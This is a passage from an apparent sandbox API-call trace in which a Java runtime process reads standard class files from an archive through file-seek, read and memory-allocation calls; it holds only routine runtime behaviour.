_Dest="java/nio/ByteBuffer.class") returned="java/nio/ByteBuffer.class" [0095.816] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317f4ac, lpNewFilePointer=0x208dd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd20*=51901612) returned 1 [0095.816] ReadFile (in: hFile=0x134, lpBuffer=0x208dd70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dcf0, lpOverlapped=0x0 | out: lpBuffer=0x208dd70*, lpNumberOfBytesRead=0x208dcf0*=0x1e, lpOverlapped=0x0) returned 1 [0095.867] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317f4e3, lpNewFilePointer=0x208dd80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd80*=51901667) returned 1 [0095.867] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x13b9, lpNumberOfBytesRead=0x208dd50, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dd50*=0x13b9, lpOverlapped=0x0) returned 1 [0095.868] free (_Block=0x121daab0) [0095.868] free (_Block=0x121d9c60) [0095.894] malloc (_Size=0x48) returned 0x121d99e0 [0095.894] malloc (_Size=0xa0) returned 0x1221b230 [0095.894] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b9b0, lpNewFilePointer=0x208e380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e380*=54639024) returned 1 [0095.895] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e350, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e350*=0xa0, lpOverlapped=0x0) returned 1 [0095.895] malloc (_Size=0x1e) returned 0x121d7b20 [0095.895] free (_Block=0x1221b230) [0095.896] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317dd4f, lpNewFilePointer=0x208df80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df80*=51895631) returned 1 [0095.896] ReadFile (in: hFile=0x134, lpBuffer=0x208dfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df50, lpOverlapped=0x0 | out: lpBuffer=0x208dfd0*, lpNumberOfBytesRead=0x208df50*=0x1e, lpOverlapped=0x0) returned 1 [0095.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317dd8a, lpNewFilePointer=0x208dfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfe0*=51895690) returned 1 [0095.922] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1722, lpNumberOfBytesRead=0x208dfb0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dfb0*=0x1722, lpOverlapped=0x0) returned 1 [0095.954] malloc (_Size=0x48) returned 0x121d9ad0 [0095.954] malloc (_Size=0xa0) returned 0x1221b230 [0095.954] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b96f, lpNewFilePointer=0x208dfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfd0*=54638959) returned 1 [0095.954] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dfa0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208dfa0*=0xa0, lpOverlapped=0x0) returned 1 [0095.954] malloc (_Size=0x14) returned 0x1220c9c0 [0095.954] free (_Block=0x1221b230) [0095.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317ae68, lpNewFilePointer=0x208dbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbd0*=51883624) returned 1 [0095.955] ReadFile (in: hFile=0x134, lpBuffer=0x208dc20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dba0, lpOverlapped=0x0 | out: lpBuffer=0x208dc20*, lpNumberOfBytesRead=0x208dba0*=0x1e, lpOverlapped=0x0) returned 1 [0096.037] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317ae99, lpNewFilePointer=0x208dc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc30*=51883673) returned 1 [0096.037] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2eb6, lpNumberOfBytesRead=0x208dc00, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dc00*=0x2eb6, lpOverlapped=0x0) returned 1 [0096.245] malloc (_Size=0x48) returned 0x121d8fe0 [0096.245] malloc (_Size=0xa0) returned 0x1221b230 [0096.245] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b929, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=54638889) returned 1 [0096.245] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d7c0*=0xa0, lpOverlapped=0x0) returned 1 [0096.245] malloc (_Size=0x19) returned 0x121d7d30 [0096.246] free (_Block=0x1221b230) [0096.246] strlen (_Str="java/nio/ByteOrder.class") returned 0x18 [0096.246] strcpy (in: _Dest=0x208d970, _Source="java/nio/ByteOrder.class" | out: _Dest="java/nio/ByteOrder.class") returned="java/nio/ByteOrder.class" [0096.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317ac0d, lpNewFilePointer=0x208d3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3f0*=51883021) returned 1 [0096.246] ReadFile (in: hFile=0x134, lpBuffer=0x208d440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3c0, lpOverlapped=0x0 | out: lpBuffer=0x208d440*, lpNumberOfBytesRead=0x208d3c0*=0x1e, lpOverlapped=0x0) returned 1 [0096.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317ac43, lpNewFilePointer=0x208d450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d450*=51883075) returned 1 [0096.246] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x208d420, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208d420*=0x225, lpOverlapped=0x0) returned 1 [0096.246] free (_Block=0x1220c9c0) [0096.247] free (_Block=0x121d9ad0) [0096.254] strlen (_Str="java/util/concurrent/atomic/AtomicLong.class") returned 0x2c [0096.254] malloc (_Size=0x48) returned 0x121d95d0 [0096.254] malloc (_Size=0xa0) returned 0x1221b230 [0096.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f4710, lpNewFilePointer=0x208d930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d930*=54478608) returned 1 [0096.254] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d900, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d900*=0xa0, lpOverlapped=0x0) returned 1 [0096.254] malloc (_Size=0x2d) returned 0x121daab0 [0096.254] free (_Block=0x1221b230) [0096.254] strlen (_Str="java/util/concurrent/atomic/AtomicLong.class") returned 0x2c [0096.254] strcpy (in: _Dest=0x208dab0, _Source="java/util/concurrent/atomic/AtomicLong.class" | out: _Dest="java/util/concurrent/atomic/AtomicLong.class") returned="java/util/concurrent/atomic/AtomicLong.class" [0096.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b8cdc0, lpNewFilePointer=0x208d530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d530*=45665728) returned 1 [0096.255] ReadFile (in: hFile=0x134, lpBuffer=0x208d580, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d500, lpOverlapped=0x0 | out: lpBuffer=0x208d580*, lpNumberOfBytesRead=0x208d500*=0x1e, lpOverlapped=0x0) returned 1 [0096.321] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b8ce0a, lpNewFilePointer=0x208d590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d590*=45665802) returned 1 [0096.322] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xa3d, lpNumberOfBytesRead=0x208d560, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d560*=0xa3d, lpOverlapped=0x0) returned 1 [0096.343] free (_Block=0x121d7d30) [0096.343] free (_Block=0x121d8fe0) [0096.359] strlen (_Str="java/nio/Bits$1.class") returned 0x15 [0096.360] malloc (_Size=0x48) returned 0x121d9670 [0096.360] malloc (_Size=0xa0) returned 0x1221b230 [0096.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b8e6, lpNewFilePointer=0x208d930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d930*=54638822) returned 1 [0096.360] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d900, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d900*=0xa0, lpOverlapped=0x0) returned 1 [0096.360] malloc (_Size=0x16) returned 0x1220ca40 [0096.361] free (_Block=0x1221b230) [0096.361] strlen (_Str="java/nio/Bits$1.class") returned 0x15 [0096.361] strcpy (in: _Dest=0x208dab0, _Source="java/nio/Bits$1.class" | out: _Dest="java/nio/Bits$1.class") returned="java/nio/Bits$1.class" [0096.361] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317a902, lpNewFilePointer=0x208d530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d530*=51882242) returned 1 [0096.361] ReadFile (in: hFile=0x134, lpBuffer=0x208d580, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d500, lpOverlapped=0x0 | out: lpBuffer=0x208d580*, lpNumberOfBytesRead=0x208d500*=0x1e, lpOverlapped=0x0) returned 1 [0096.361] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317a935, lpNewFilePointer=0x208d590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d590*=51882293) returned 1 [0096.361] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2d8, lpNumberOfBytesRead=0x208d560, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d560*=0x2d8, lpOverlapped=0x0) returned 1 [0096.362] free (_Block=0x121daab0) [0096.362] free (_Block=0x121d95d0) [0096.364] strlen (_Str="sun/misc/JavaNioAccess.class") returned 0x1c [0096.364] malloc (_Size=0x48) returned 0x121d9da0 [0096.364] malloc (_Size=0xa0) returned 0x1221b230 [0096.364] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b89c, lpNewFilePointer=0x208ce70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce70*=54638748) returned 1 [0096.364] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce40, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208ce40*=0xa0, lpOverlapped=0x0) returned 1 [0096.364] malloc (_Size=0x1d) returned 0x121d80c0 [0096.364] free (_Block=0x1221b230) [0096.364] strlen (_Str="sun/misc/JavaNioAccess.class") returned 0x1c [0096.364] strcpy (in: _Dest=0x208cff0, _Source="sun/misc/JavaNioAccess.class" | out: _Dest="sun/misc/JavaNioAccess.class") returned="sun/misc/JavaNioAccess.class" [0096.365] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317a76f, lpNewFilePointer=0x208ca70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca70*=51881839) returned 1 [0096.365] ReadFile (in: hFile=0x134, lpBuffer=0x208cac0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca40, lpOverlapped=0x0 | out: lpBuffer=0x208cac0*, lpNumberOfBytesRead=0x208ca40*=0x1e, lpOverlapped=0x0) returned 1 [0096.365] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317a7a9, lpNewFilePointer=0x208cad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cad0*=51881897) returned 1 [0096.365] ReadFile (in: hFile=0x134, lpBuffer=0x2102ea0, nNumberOfBytesToRead=0x159, lpNumberOfBytesRead=0x208caa0, lpOverlapped=0x0 | out: lpBuffer=0x2102ea0*, lpNumberOfBytesRead=0x208caa0*=0x159, lpOverlapped=0x0) returned 1 [0096.365] free (_Block=0x1220ca40) [0096.365] free (_Block=0x121d9670) [0096.375] malloc (_Size=0x48) returned 0x121d9d00 [0096.375] malloc (_Size=0xa0) returned 0x1221b230 [0096.375] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b852, lpNewFilePointer=0x208e5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5a0*=54638674) returned 1 [0096.375] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e570, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e570*=0xa0, lpOverlapped=0x0) returned 1 [0096.375] malloc (_Size=0x1d) returned 0x121d7d30 [0096.375] free (_Block=0x1221b230) [0096.375] strlen (_Str="java/io/BufferedWriter.class") returned 0x1c [0096.375] strcpy (in: _Dest=0x208e720, _Source="java/io/BufferedWriter.class" | out: _Dest="java/io/BufferedWriter.class") returned="java/io/BufferedWriter.class" [0096.376] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3179c1a, lpNewFilePointer=0x208e1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1a0*=51878938) returned 1 [0096.376] ReadFile (in: hFile=0x134, lpBuffer=0x208e1f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e170, lpOverlapped=0x0 | out: lpBuffer=0x208e1f0*, lpNumberOfBytesRead=0x208e170*=0x1e, lpOverlapped=0x0) returned 1 [0096.376] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3179c54, lpNewFilePointer=0x208e200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e200*=51878996) returned 1 [0096.376] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xb1b, lpNumberOfBytesRead=0x208e1d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e1d0*=0xb1b, lpOverlapped=0x0) returned 1 [0096.377] free (_Block=0x121d80c0) [0096.377] free (_Block=0x121d9da0) [0096.384] strlen (_Str="sun/security/action/GetPropertyAction.class") returned 0x2b [0096.384] malloc (_Size=0x48) returned 0x121d9c60 [0096.384] malloc (_Size=0xa0) returned 0x1221b230 [0096.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341be06, lpNewFilePointer=0x208e4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4d0*=54640134) returned 1 [0096.385] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4a0, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208e4a0*=0xa0, lpOverlapped=0x0) returned 1 [0096.385] malloc (_Size=0x2c) returned 0x121d9f30 [0096.385] free (_Block=0x1221b230) [0096.385] strlen (_Str="sun/security/action/GetPropertyAction.class") returned 0x2b [0096.386] strcpy (in: _Dest=0x208e650, _Source="sun/security/action/GetPropertyAction.class" | out: _Dest="sun/security/action/GetPropertyAction.class") returned="sun/security/action/GetPropertyAction.class" [0096.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318c4c8, lpNewFilePointer=0x208e0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0d0*=51954888) returned 1 [0096.386] ReadFile (in: hFile=0x134, lpBuffer=0x208e120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0a0, lpOverlapped=0x0 | out: lpBuffer=0x208e120*, lpNumberOfBytesRead=0x208e0a0*=0x1e, lpOverlapped=0x0) returned 1 [0096.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x318c511, lpNewFilePointer=0x208e130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e130*=51954961) returned 1 [0096.386] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x408, lpNumberOfBytesRead=0x208e100, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e100*=0x408, lpOverlapped=0x0) returned 1 [0096.386] free (_Block=0x121d7d30) [0096.387] free (_Block=0x121d9d00) [0096.401] strlen (_Str="java/io/DefaultFileSystem.class") returned 0x1f [0096.401] malloc (_Size=0x48) returned 0x121d99e0 [0096.401] malloc (_Size=0xa0) returned 0x1221b230 [0096.401] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b805, lpNewFilePointer=0x208da40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da40*=54638597) returned 1 [0096.401] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da10, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208da10*=0xa0, lpOverlapped=0x0) returned 1 [0096.401] malloc (_Size=0x20) returned 0x121d7ee0 [0096.401] free (_Block=0x1221b230) [0096.402] strlen (_Str="java/io/DefaultFileSystem.class") returned 0x1f [0096.402] strcpy (in: _Dest=0x208dbc0, _Source="java/io/DefaultFileSystem.class" | out: _Dest="java/io/DefaultFileSystem.class") returned="java/io/DefaultFileSystem.class" [0096.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3179ae4, lpNewFilePointer=0x208d640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d640*=51878628) returned 1 [0096.402] ReadFile (in: hFile=0x134, lpBuffer=0x208d690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d610, lpOverlapped=0x0 | out: lpBuffer=0x208d690*, lpNumberOfBytesRead=0x208d610*=0x1e, lpOverlapped=0x0) returned 1 [0096.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3179b21, lpNewFilePointer=0x208d6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d6a0*=51878689) returned 1 [0096.402] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x208d670, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208d670*=0xf9, lpOverlapped=0x0) returned 1 [0096.402] free (_Block=0x121d9f30) [0096.403] free (_Block=0x121d9c60) [0096.408] malloc (_Size=0x48) returned 0x121d9670 [0096.408] malloc (_Size=0xa0) returned 0x1221b230 [0096.408] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b7ba, lpNewFilePointer=0x208dca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dca0*=54638522) returned 1 [0096.408] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc70, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208dc70*=0xa0, lpOverlapped=0x0) returned 1 [0096.408] malloc (_Size=0x1e) returned 0x121d7d30 [0096.409] free (_Block=0x1221b230) [0096.409] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3177ce8, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51870952) returned 1 [0096.409] ReadFile (in: hFile=0x134, lpBuffer=0x208d8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x208d8f0*, lpNumberOfBytesRead=0x208d870*=0x1e, lpOverlapped=0x0) returned 1 [0096.414] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3177d23, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=51871011) returned 1 [0096.414] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1dc1, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d8d0*=0x1dc1, lpOverlapped=0x0) returned 1 [0096.423] malloc (_Size=0x48) returned 0x121d93f0 [0096.423] malloc (_Size=0xa0) returned 0x1221b230 [0096.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b774, lpNewFilePointer=0x208d260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d260*=54638452) returned 1 [0096.423] ReadFile (in: hFile=0x134, lpBuffer=0x1221b230, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d230, lpOverlapped=0x0 | out: lpBuffer=0x1221b230*, lpNumberOfBytesRead=0x208d230*=0xa0, lpOverlapped=0x0) returned 1 [0096.423] malloc (_Size=0x19) returned 0x121d8090 [0096.423] free (_Block=0x1221b230) [0096.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31774b4, lpNewFilePointer=0x208ce60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce60*=51868852) returned 1 [0096.423] ReadFile (in: hFile=0x134, lpBuffer=0x208ceb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce30, lpOverlapped=0x0 | out: lpBuffer=0x208ceb0*, lpNumberOfBytesRead=0x208ce30*=0x1e, lpOverlapped=0x0) returned 1 [0096.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31774ea, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=51868906) returned 1 [0096.424] ReadFile (in: hFile=0x134, lpBuffer=0x2104990, nNumberOfBytesToRead=0x7fe, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x2104990*, lpNumberOfBytesRead=0x208ce90*=0x7fe, lpOverlapped=0x0) returned 1 [0096.427] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x7ffb6097d8b0, phModule=0x208e6e0 | out: phModule=0x208e6e0*=0x7ffb60950000) returned 1 [0096.427] GetProcAddress (hModule=0x7ffb60950000, lpProcName="GetFinalPathNameByHandleW") returned 0x7ffb6097dae0 [0096.428] strlen (_Str="java/io/ExpiringCache.class") returned 0x1b [0096.428] malloc (_Size=0x48) returned 0x121d8fe0 [0096.429] malloc (_Size=0xa0) returned 0x1221ba40 [0096.429] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b72b, lpNewFilePointer=0x208dc40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc40*=54638379) returned 1 [0096.429] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc10, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208dc10*=0xa0, lpOverlapped=0x0) returned 1 [0096.429] malloc (_Size=0x1c) returned 0x121d7d30 [0096.429] free (_Block=0x1221ba40) [0096.429] strlen (_Str="java/io/ExpiringCache.class") returned 0x1b [0096.429] strcpy (in: _Dest=0x208ddc0, _Source="java/io/ExpiringCache.class" | out: _Dest="java/io/ExpiringCache.class") returned="java/io/ExpiringCache.class" [0096.429] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3176c5e, lpNewFilePointer=0x208d840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d840*=51866718) returned 1 [0096.429] ReadFile (in: hFile=0x134, lpBuffer=0x208d890, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d810, lpOverlapped=0x0 | out: lpBuffer=0x208d890*, lpNumberOfBytesRead=0x208d810*=0x1e, lpOverlapped=0x0) returned 1 [0096.442] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3176c97, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51866775) returned 1 [0096.442] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x81d, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d870*=0x81d, lpOverlapped=0x0) returned 1 [0096.442] free (_Block=0x121d8090) [0096.443] free (_Block=0x121d93f0) [0096.449] strlen (_Str="java/io/ExpiringCache$1.class") returned 0x1d [0096.449] malloc (_Size=0x48) returned 0x121d9490 [0096.449] malloc (_Size=0xa0) returned 0x1221ba40 [0096.449] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b6e0, lpNewFilePointer=0x208db70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db70*=54638304) returned 1 [0096.449] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db40, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208db40*=0xa0, lpOverlapped=0x0) returned 1 [0096.449] malloc (_Size=0x1e) returned 0x121d7d60 [0096.450] free (_Block=0x1221ba40) [0096.450] strlen (_Str="java/io/ExpiringCache$1.class") returned 0x1d [0096.450] strcpy (in: _Dest=0x208dcf0, _Source="java/io/ExpiringCache$1.class" | out: _Dest="java/io/ExpiringCache$1.class") returned="java/io/ExpiringCache$1.class" [0096.450] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31768fc, lpNewFilePointer=0x208d770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d770*=51865852) returned 1 [0096.450] ReadFile (in: hFile=0x134, lpBuffer=0x208d7c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d740, lpOverlapped=0x0 | out: lpBuffer=0x208d7c0*, lpNumberOfBytesRead=0x208d740*=0x1e, lpOverlapped=0x0) returned 1 [0096.450] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3176937, lpNewFilePointer=0x208d7d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7d0*=51865911) returned 1 [0096.450] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x327, lpNumberOfBytesRead=0x208d7a0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d7a0*=0x327, lpOverlapped=0x0) returned 1 [0096.450] free (_Block=0x121d7d30) [0096.451] free (_Block=0x121d8fe0) [0096.453] strlen (_Str="java/util/LinkedHashMap.class") returned 0x1d [0096.454] malloc (_Size=0x48) returned 0x121d93f0 [0096.454] malloc (_Size=0xa0) returned 0x1221ba40 [0096.454] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b695, lpNewFilePointer=0x208d130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d130*=54638229) returned 1 [0096.454] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d100, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208d100*=0xa0, lpOverlapped=0x0) returned 1 [0096.454] malloc (_Size=0x1e) returned 0x121d8090 [0096.454] free (_Block=0x1221ba40) [0096.454] strlen (_Str="java/util/LinkedHashMap.class") returned 0x1d [0096.454] strcpy (in: _Dest=0x208d2b0, _Source="java/util/LinkedHashMap.class" | out: _Dest="java/util/LinkedHashMap.class") returned="java/util/LinkedHashMap.class" [0096.454] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3175024, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=51859492) returned 1 [0096.455] ReadFile (in: hFile=0x134, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0096.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317505f, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=51859551) returned 1 [0096.494] ReadFile (in: hFile=0x134, lpBuffer=0x2102ef0, nNumberOfBytesToRead=0x189d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x2102ef0*, lpNumberOfBytesRead=0x208cd60*=0x189d, lpOverlapped=0x0) returned 1 [0096.495] free (_Block=0x121d7d60) [0096.495] free (_Block=0x121d9490) [0096.541] strlen (_Str="java/io/File$PathStatus.class") returned 0x1d [0096.541] malloc (_Size=0x48) returned 0x121d9300 [0096.541] malloc (_Size=0xa0) returned 0x1221ba40 [0096.541] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b64a, lpNewFilePointer=0x208e140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e140*=54638154) returned 1 [0096.541] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e110, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208e110*=0xa0, lpOverlapped=0x0) returned 1 [0096.541] malloc (_Size=0x1e) returned 0x121d7d30 [0096.541] free 